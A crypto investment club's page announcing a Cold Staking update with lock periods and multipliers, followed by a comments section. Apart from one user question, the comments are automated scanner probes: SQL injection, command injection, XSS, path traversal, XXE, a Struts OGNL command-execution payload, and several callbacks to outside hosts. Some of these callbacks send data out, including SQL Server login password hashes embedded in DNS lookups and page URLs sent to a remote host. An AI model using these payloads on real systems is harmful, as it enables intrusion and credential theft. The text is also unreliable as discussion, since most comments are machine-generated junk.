Bulls Investing Club

Enhancing the Bull

At Bulls Investing Club, we are committed to providing the best investment solutions to our investors, and therefore we are always looking for the latest technological advancement.

Callisto Network has recently deployed an update of its Cold Staking protocol, which offers many advantages, including a multiplier system that favors investors in the long term.

The new Cold Staking protocol has met with success within the crypto community, and we have decided to leverage it to maximize our investor profit.

 

Boosting Your Profits

When investing their funds, the investors will have the possibility to lock their funds on four different periods of time according to their profit objectives.

Each period has a specific multiplier determining the profit share that the investor will receive. Thus, by increasing the investment period, an investor increases his multiplier and, therefore, his/her earnings.

Multiplier value according to the investment period:

  • 3 months: 0.25
  • 6 months: 0.50
  • 9 months: 0.75
  • 12 months: 1.00

 

BUSDT Staking Rules

  • The minimum staking amount is set to 200 USDT.
  • The contract allows 4 Investment periods, 3 months, 6 months, 9 months, and 12 months. Therefore the minimum investment period is 3 months.
  • When initiating staking, the investor selects the number of rounds he/she wants to invest in its tokens.
  • After depositing funds into the contract, the funds are locked according to the selected period.
  • It is not possible to add funds to a staking plan during the locking period. However, investors can set up several staking plans.
  • After 30 days, investors have the option to claim their rewards within 5 days. Rewards not claimed within this period will be reinvested to generate compound interest.
  • After the locking period has expired, the investor can withdraw its stake AND reward at any time.
  • Stakers only earn interest during the defined staking period.

Note: Please keep in mind that making a deposit to the staking contract and claiming the reward requires transaction fees to be paid.

 

So What is Changing?

On July 10, 2021, we will run a script to return the principal and the interests generated to date to the investors. They can either reinvest the funds via the new protocol or withdraw them by swapping their BUSDT into USDT.

Crypto.bot, as a key component of our ecosystem, has been updated, meaning that it is fully compatible with the new staking contract and its features.

478 comments

I accidentally sent BUSD via crypto.bot to BUSDT contract address ( Binance Smart Network ). Can i get this back?

https://bscscan.com/tx/0x502dfcee2ed67c2d62d0f7434d6fcd26d316e4a09b0782ff29c0b53c3736f94d

echo bblxcw$()\ ghwvwx\nz^xyu||a #' &echo bblxcw$()\ ghwvwx\nz^xyu||a #|" &echo bblxcw$()\ ghwvwx\nz^xyu||a #

response.write(9179803*9012466)

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

bnGLKa40

&echo mlfehn$()\ ueugao\nz^xyu||a #' &echo mlfehn$()\ ueugao\nz^xyu||a #|" &echo mlfehn$()\ ueugao\nz^xyu||a #

'+response.write(9179803*9012466)+'

-1 OR 2+840-840-1=0+0+0+1 --

|echo lxxjsg$()\ oqstra\nz^xyu||a #' |echo lxxjsg$()\ oqstra\nz^xyu||a #|" |echo lxxjsg$()\ oqstra\nz^xyu||a #

"+response.write(9179803*9012466)+"

)

-1 OR 3+840-840-1=0+0+0+1 --

(nslookup hitgrxqxmvlsnb6e72.bxss.me||perl -e "gethostbyname('hitgrxqxmvlsnb6e72.bxss.me')")

'.gethostbyname(lc('hitci'.'vfdwbpkec14eb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(87).chr(110).chr(78).'

!(()&&!|*|*|

-1 OR 3*2<(0+5+840-840) --

$(nslookup hitwoskzmneff61be4.bxss.me||perl -e "gethostbyname('hitwoskzmneff61be4.bxss.me')")

index.php

^(#$!@#$)(()))******

".gethostbyname(lc("hitnr"."ittdwtkr2d045.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(85).chr(118).chr(90)."

Http://bxss.me/t/fit.txt

-1 OR 3*2>(0+5+840-840) --

&nslookup hityoiuespluf2790d.bxss.me&'\"`0&nslookup hityoiuespluf2790d.bxss.me&`'

-1 OR 2+582-582-1=0+0+0+1

index.php/.

http://bxss.me/t/fit.txt?.jpg

'"

&(nslookup hitgufkcknlho0d232.bxss.me||perl -e "gethostbyname('hitgufkcknlho0d232.bxss.me')")&'\"`0&(nslookup hitgufkcknlho0d232.bxss.me||perl -e "gethostbyname('hitgufkcknlho0d232.bxss.me')")&`'

-1 OR 3+582-582-1=0+0+0+1

/etc/shells

<!--

|(nslookup hitydkkdygdmiac98e.bxss.me||perl -e "gethostbyname('hitydkkdygdmiac98e.bxss.me')")

-1 OR 3*2<(0+5+582-582)

c:/windows/win.ini

`(nslookup hitgdrrmbzwbv5b211.bxss.me||perl -e "gethostbyname('hitgdrrmbzwbv5b211.bxss.me')")`

-1 OR 3*2>(0+5+582-582)

bxss.me

-1' OR 2+222-222-1=0+0+0+1 --

;(nslookup hitfpvkdakeate8bd5.bxss.me||perl -e "gethostbyname('hitfpvkdakeate8bd5.bxss.me')")|(nslookup hitfpvkdakeate8bd5.bxss.me||perl -e "gethostbyname('hitfpvkdakeate8bd5.bxss.me')")&(nslookup hitfpvkdakeate8bd5.bxss.me||perl -e "gethostbyname('hitfpvkdakeate8bd5.bxss.me')")

-1' OR 3+222-222-1=0+0+0+1 --

-1' OR 3*2<(0+5+222-222) --

-1' OR 3*2>(0+5+222-222) --

-1' OR 2+746-746-1=0+0+0+1 or 'aSIwnnhO'='

-1' OR 3+746-746-1=0+0+0+1 or 'aSIwnnhO'='

-1' OR 3*2<(0+5+746-746) or 'aSIwnnhO'='

-1' OR 3*2>(0+5+746-746) or 'aSIwnnhO'='

-1" OR 2+52-52-1=0+0+0+1 --

-1" OR 3+52-52-1=0+0+0+1 --

-1" OR 3*2<(0+5+52-52) --

-1" OR 3*2>(0+5+52-52) --

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

-1; waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

Oy5VW2IV'; waitfor delay '0:0:15' --

-5 OR 685=(SELECT 685 FROM PG_SLEEP(15))--

-5) OR 210=(SELECT 210 FROM PG_SLEEP(15))--

-1)) OR 829=(SELECT 829 FROM PG_SLEEP(15))--

BEGHiJ9P' OR 319=(SELECT 319 FROM PG_SLEEP(15))--

FNLqyE6X') OR 603=(SELECT 603 FROM PG_SLEEP(15))--

NsjfmE23')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1'"

@@pKFtN

response.write(9258825*9985083)

echo jpayqk$()\ shoeyp\nz^xyu||a #' &echo jpayqk$()\ shoeyp\nz^xyu||a #|" &echo jpayqk$()\ shoeyp\nz^xyu||a #

&echo duwchk$()\ awefxr\nz^xyu||a #' &echo duwchk$()\ awefxr\nz^xyu||a #|" &echo duwchk$()\ awefxr\nz^xyu||a #

KKyJjM0Z

'+response.write(9258825*9985083)+'

|echo ghocce$()\ gpmaex\nz^xyu||a #' |echo ghocce$()\ gpmaex\nz^xyu||a #|" |echo ghocce$()\ gpmaex\nz^xyu||a #

"+response.write(9258825*9985083)+"

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

(nslookup hitthiutywrbq8f831.bxss.me||perl -e "gethostbyname('hitthiutywrbq8f831.bxss.me')")

)

!(()&&!|*|*|

$(nslookup hitmlhezssfzf286bb.bxss.me||perl -e "gethostbyname('hitmlhezssfzf286bb.bxss.me')")

Http://bxss.me/t/fit.txt

'.gethostbyname(lc('hithb'.'jnnqvfea0c7f2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(88).chr(97).chr(90).'

&nslookup hitklcxrjrpbx91e0c.bxss.me&'\"`0&nslookup hitklcxrjrpbx91e0c.bxss.me&`'

^(#$!@#$)(()))******

http://bxss.me/t/fit.txt?.jpg

".gethostbyname(lc("hitla"."xwdwmjmk7525c.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(65).chr(107).chr(76)."

&(nslookup hittdchdkqlcp6e894.bxss.me||perl -e "gethostbyname('hittdchdkqlcp6e894.bxss.me')")&'\"`0&(nslookup hittdchdkqlcp6e894.bxss.me||perl -e "gethostbyname('hittdchdkqlcp6e894.bxss.me')")&`'

/etc/shells

c:/windows/win.ini

|(nslookup hitsyjhntbaffb88bc.bxss.me||perl -e "gethostbyname('hitsyjhntbaffb88bc.bxss.me')")

bxss.me

`(nslookup hitmphewtthgyef1d0.bxss.me||perl -e "gethostbyname('hitmphewtthgyef1d0.bxss.me')")`

index.php

;(nslookup hitolgueabstb5925c.bxss.me||perl -e "gethostbyname('hitolgueabstb5925c.bxss.me')")|(nslookup hitolgueabstb5925c.bxss.me||perl -e "gethostbyname('hitolgueabstb5925c.bxss.me')")&(nslookup hitolgueabstb5925c.bxss.me||perl -e "gethostbyname('hitolgueabstb5925c.bxss.me')")

-1 OR 2+646-646-1=0+0+0+1 --

index.php/.

-1 OR 3+646-646-1=0+0+0+1 --

'"

-1 OR 3*2<(0+5+646-646) --

<!--

-1 OR 3*2>(0+5+646-646) --

-1 OR 2+339-339-1=0+0+0+1

-1 OR 3+339-339-1=0+0+0+1

-1 OR 3*2<(0+5+339-339)

-1 OR 3*2>(0+5+339-339)

-1' OR 2+341-341-1=0+0+0+1 --

-1' OR 3+341-341-1=0+0+0+1 --

-1' OR 3*2<(0+5+341-341) --

-1' OR 3*2>(0+5+341-341) --

-1' OR 2+746-746-1=0+0+0+1 or 'QM5arivH'='

-1' OR 3+746-746-1=0+0+0+1 or 'QM5arivH'='

-1' OR 3*2<(0+5+746-746) or 'QM5arivH'='

-1' OR 3*2>(0+5+746-746) or 'QM5arivH'='

-1" OR 2+129-129-1=0+0+0+1 --

-1" OR 3+129-129-1=0+0+0+1 --

-1" OR 3*2<(0+5+129-129) --

-1" OR 3*2>(0+5+129-129) --

if(now()=sysdate(),sleep(15),0)

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

-1; waitfor delay '0:0:15' --

-1); waitfor delay '0:0:15' --

1 waitfor delay '0:0:15' --

alJtwYKO'; waitfor delay '0:0:15' --

-5 OR 750=(SELECT 750 FROM PG_SLEEP(15))--

-5) OR 288=(SELECT 288 FROM PG_SLEEP(15))--

-1)) OR 710=(SELECT 710 FROM PG_SLEEP(15))--

e7IVsyPB' OR 305=(SELECT 305 FROM PG_SLEEP(15))--

arOOl4FQ') OR 503=(SELECT 503 FROM PG_SLEEP(15))--

tqlhzIUL')) OR 203=(SELECT 203 FROM PG_SLEEP(15))--

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1'"

@@jG31E

3

3

3

-1 OR 1=1

%27

-1 OR 1=1

' WAITFOR DELAY '0:0:25'-- /* 1e465cde-c0ea-49b0-afc6-aae3da5b6717 */

"& SET /A 0xFFF9999-50653 &

"& ping -n 25 127.0.0.1 &

-1 OR 1=1

(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

-1 OR 1=1

/../../../../../../../../../../boot.ini

1 WAITFOR DELAY '0:0:25'-- /* a455c2ed-fc68-4597-a632-0739ed7b24ab */

'& SET /A 0xFFF9999-91939 &

'"--></style></scRipt><scRipt>netsparker(0x033425)</scRipt>

'& ping -n 25 127.0.0.1 &

'

'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'

NS
NO

WAITFOR DELAY '0:0:25'-- /* 4db7a970-3fc6-4ad5-b717-3124e08d8ff8 */

& SET /A 0xFFF9999-26678 &

%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x03342D%29%3C%2FscRipt%3E

& ping -n 25 127.0.0.1 &

AND 'NS='ss

convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))

' OR 1=1 OR 'ns'='ns

/../../../../../../../../../../boot.ini

1) WAITFOR DELAY '0:0:25'-- /* 60a1c63f-3368-45b3-970d-c47c8f00d7d6 */

SET /A 0xFFF9999-49348 &

data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDMzNDMzKTwvc2NyaXB0Pg==

ping -n 25 127.0.0.1 &

" OR 1=1 OR "ns"="ns

'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='

-1 OR 17-7=10

file:///boot.ini

hTTp://r87.com/n

') WAITFOR DELAY '0:0:25'-- /* 6b6b2b31-c5c2-41d2-aa6e-d03bc2a09864 */

SET /A 0xFFF9999-75988

'" ns=netsparker(0x033439)

"&ping -w 25 127.0.0.1 &"

OR X='ss

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

' OR 1=1 OR '1'='1

c:\boot.ini

')) WAITFOR DELAY '0:0:25'-- /* 83c6341d-12a5-406e-83dc-685ccd695e57 */

| SET /A 0xFFF9999-73517

1 ns=netsparker(0x033441)

'&ping -w 25 127.0.0.1 &'

' OR 1=1 OR '1'='1

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

" OR 1=1 OR "1"="1

ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................

http://r87.com/n?.php

response.write(268409241-7650)'

1)) WAITFOR DELAY '0:0:25'-- /* a0a286ca-0ca8-4427-9d32-1dca35b289dd */

";expr 268409241 - 45006;"

//r87.com/n/n.css?0x03344E

&ping -w 25 127.0.0.1 &

" OR 1=1 OR "1"="1

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

-1 OR 1=1

%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

+response.write(268409241-1606)'

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 3ae67bed-f6bf-454c-9ad2-04d0ce4c815c */

';expr 268409241 - 88982;'

//r87.com/n/j/?0x033476

ping -w 25 127.0.0.1 &

-1 OR 1=1

{{268409241-13554}}

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

-1 OR 1=1

file%3a%2f%2f%2fboot.ini

r87.com/n

"+response.write(268409241-83243)+"

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* a5b8642c-06fd-4c90-80b4-ba2fcdc18a31 */

;expr 268409241 - 58936;x

'><net sparker=netsparker(0x0334BB)>

ping -n 25 127.0.0.1

-1 OR 1=1

ns:netsparker056650=vuln

=268409241-15794

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

'

c%3a%5cboot.ini

<% response.write(268409241-69275) %>

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 0feaaa9c-c63e-479d-b84c-a5118349a3cf */

expr 268409241 - 65326;

"><net sparker=netsparker(0x0334D2)>

ping -w 25 127.0.0.1

NS
NO

http://example.com/?
ns: netsparker056650=vuln

<%- 268409241-92522 %>

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

AND 'NS='ss

/../../../../../../../../../../web.config

print(int)0xFFF9999-70515

syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 9f9b0149-bc99-4f18-853b-ab335be9d8b2 */

expr 268409241 - 76287

<iMg src=N onerror=netsparker(0x0334DC)>

|ping -n 25 127.0.0.1

' OR 1=1 OR 'ns'='ns

ns:netsparker056650=vuln

<#assign x=268409241 - 50965>
${x?string["0"]}

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

" OR 1=1 OR "ns"="ns

${28275*28275-(5604)}

/../../../../../../../../../../windows/win.ini

print(int)0xFFF9999-38751;

+ ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 2b8c67ca-68ad-4908-9ee9-4759c2bb1d25 */

<!--#exec cmd="expr 268409241 - 41881"-->

javascript:netsparker(0x0334F8)

N3tSp4rK3R

-1 OR 17-7=10

ns:netsparker056650=vuln

<%= "#{268409241-12006}" %>

NSFTW

OR X='ss

#{28275*28275-(49727)}

file:///windows/win.ini

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>

+print(int)0xFFF9999-12039;//

-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 87db889e-3705-4090-86b9-ea9f16e73fbd */

|expr${IFS}268409241${IFS}-${IFS}13371

<scRipt>ns(0x033500)</scRipt>

' OR 1=1 OR '1'='1

NS09<s1﹥DBLʺSNGLʹNS09

https://bullsinvesting.club/trace.axd

@(268409241-39165)

'+NSFTW+'

' OR 1=1 OR '1'='1

<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>

'+print(int)0xFFF9999-17280+'

((select sleep(25)))a-- 1 /* dfe64833-6bec-4833-87ff-487a81ef0048 */

<%a style=x:expre/**/ssion(netsparker(0x033512))>

" OR 1=1 OR "1"="1

jdnsqy3xdcybaibyd2c3javwo_obwolawvadayrdilm.r87.me

bullsinvesting.club/trace.axd

{{ 268409241- 53656 }}

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

" OR 1=1 OR "1"="1

c:\windows\win.ini

&thisdoesntexists;

"+print(int)0xFFF9999-98609+"

(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 79d10653-7819-4367-b1c4-f3f9e9958a26 */

n;ns:expression(netsparker(0x033528));

exec('xp_dirtree ''\\jdnsqy3xdcjbb6eufvmo3mbyvm2x-xo3wbxpisk8'+'vnm.r87.me'+'\c$\a''')

//jdnsqy3xdcnvihvumu2bn6g1uogznynoenmzglgrxbi.r87.me

157.245.92.196/trace.axd

(268409241-27568)

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://jdnsqy3x"><!ENTITY % d "dcizowb4tpzgjcf-8xsqlmtir6ugaggwv8k.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

...//...//...//...//...//...//...//...//...//...//...//windows/win.ini

<?=(int)0xFFF9999-61093;//?>

1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* a7f1f132-2e21-4cb0-bd72-b9b7c36528da */

body{x:expression(netsparker(0x033560))}

declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.jdnsqy3xdcv88zp9601d6l5rmibrf_4yawr81xyp'+'nda.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')

http://jdnsqy3xdcjc3mycdhi1t9yrz1fhlhsbnmnp-kfx1ip.r87.me/p/

http://r87.me/r/?id=jdnsqy3xdcvkt2l3nuqaw8hxzjkmkczldsj1jvx02_4

127.100.11.2/trace.axd

{{ 268409241- 33678 }}

'"--></style></scRipt><scRipt src="//jdnsqy3xdc6wvif3lne53vjcu9-j2hcihvzmtapis1u&#46;r87&#46;me"></scRipt>

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://jdnsqy3x"><!ENTITY % d "dc3q-__zzdzfxwu51jimhz3ny4hmpsm8bly.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1

....//....//....//....//....//....//....//....//....//....//....//windows/win.ini

{php}print(int)0xFFF9999-50116;{/php}

1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* ab756ccb-074f-4643-89a9-8de561634b6d */

*/netsparker(0x033574);/*

1;exec('xp_dirtree ''\\jdnsqy3xdckkjqwvcsath8h00crlxowy51m0yxjz'+'xme.r87.me'+'\c$\a''')--

php://filter//resource=http://jdnsqy3xdckwbucd8zaqzbzhxjcyu9n3ffhe4h00hcd.r87.me/p/

127.0.0.1/trace.axd

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://jdnsqy3x"><!ENTITY % d "dcurrpo1lxnxijk_ewcidgxxqxdameohg3o.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

gethostbyname(trim('jdnsqy3xdcznqkjhunh1mvocmavz4wxqt8vrchts'.'fac.r87.me'))

.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini

'{${print(int)0xFFF9999-84508}}'

';SELECT pg_sleep(25)-- /* 05db9064-3766-4560-bbe5-a41655848aad */

'+netsparker(0x0335EF)+'

<iMg src=N onerror="this.onerror='';this.src='//jdnsqy3xdchx4zkotbfw1iekzv8g4ckrx6gic4wy'+'sk8.r87.me/r/?'+location.href">

-1';exec('xp_dirtree ''\\jdnsqy3xdcla0vlujuzdyvqguitcj4cvhmdugjzc'+'a1y.r87.me'+'\c$\a''')--

jdnsqy3xdcl1g4_1uwbt-2ja16canhvthvk0zcbsdrv.r87.me/p/

[::1]/trace.axd

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

gethostbyname(trim('jdnsqy3xdccox3dzgcsd7bk9dmjydja0d9sxngob'.'7k4.r87.me'));

. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini

[php]print(int)0xFFF9999-41193;[/php]

;SELECT pg_sleep(25)-- /* 751ecc1d-919d-44f4-8875-5eaba31fb03c */

"+netsparker(0x0336FD)+"

1) exec('xp_dirtree ''\\jdnsqy3xdcek2ct4zcnyzjurlinitxz4l4va3izg'+'w1g.r87.me'+'\c$\a''')--

https://bullsinvesting.club/elmah.axd

'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'

<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//jdnsqy3xdchw2jjorsu88zssd_ktvdmhqbavk6kh'+'xam.r87.me/r/?'+location.href">

+gethostbyname(trim('jdnsqy3xdcrlffeefkspooyeekvvhnsiqybynsw9'.'tam.r87.me'));//

/../../../../../../../../../../windows/iis6.log

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='85884').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

SELECT pg_sleep(25)-- /* 1fdf98c7-4591-404d-bf58-0f243d68805b */

\';netsparker(0x033709);///

1')exec('xp_dirtree ''\\jdnsqy3xdcdz5fc2a16bgclfqgpyvldehr99hhyz'+'iwq.r87.me'+'\c$\a''')--

bullsinvesting.club/elmah.axd

-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27

'+gethostbyname(trim('jdnsqy3xdcgfbnd6cfsvalngix1my18ho176p7ht'.'my0.r87.me'))+'

/../../../../../../../../../../proc/self/fd/2

print localtime()*0+0xFFF9999-4716

);SELECT pg_sleep(25)-- /* 8fee5c82-a5a6-49d7-9247-ed7a1acd8821 */

&#39;,netsparker(0x03372B),&#39;

1))exec('xp_dirtree ''\\jdnsqy3xdcjrtwfxy6pkds9k3qdjkia2nk27uylw'+'rqk.r87.me'+'\c$\a''')--

<fRame src=N onload="this.onload='';this.src='//jdnsqy3xdcqdvyms0ca2m9edanntznjyg7xsifqz'+'ip4.r87.me/r/?'+location.href">

157.245.92.196/elmah.axd

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1

"+gethostbyname(trim('jdnsqy3xdcbcruy8_0gr42yx8qka2y_fi3yhow2_'.'thk.r87.me'))+"

eval('print localtime()*0+0xFFF9999-43443')

');SELECT pg_sleep(25)-- /* 3e797ba6-1c00-4ef3-a5f5-73969fc4372b */

netsparker(0x033740)

1'))exec('xp_dirtree ''\\jdnsqy3xdcrslptq1xros2ug8naejjpkpncupunx'+'ldg.r87.me'+'\c$\a''')--

127.100.11.2/elmah.axd

<? gethostbyname(trim('jdnsqy3xdcucoknrcpy1ycnbushvnjsczcjtyztc'.'xua.r87.me'));//?>

/../../../../../../../../../../etc/httpd/logs/error.log

'+print localtime()*0+0xFFF9999-54513+'

'));SELECT pg_sleep(25)-- /* e300bea4-67a8-4efb-ab42-0e1f25fd0e5e */

netsparker(0x033758);

<scRipt src="data:;base64,bD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJsaW5rIik7bC5yZWw9InByZWZldGNoIjtsLmhyZWY9Ii8vamRuc3F5M3hkYy00NXN0N25wZHFiZDNtcy1uMmNxemtmaXN2enMwZiIrImxrNC5yODcubWUvci8/Iitsb2NhdGlvbi5ocmVmO2RvY3VtZW50LmhlYWQuYXBwZW5kQ2hpbGQobCk="></scRipt>

syscolumns WHERE 2>3;exec('xp_dirtree ''\\jdnsqy3xdcq-eipnz_gshve1ihbuvrcz-mwaoks8'+'fcw.r87.me'+'\c$\a''')--

127.0.0.1/elmah.axd

'{${gethostbyname(trim('jdnsqy3xdcvy-v9lftyjqztbudyjiyd8mhdlihdp'.'v_0.r87.me'))}}'

/../../../../../../../../../../etc/httpd/logs/error_log

"+print localtime()*0+0xFFF9999-18247+"

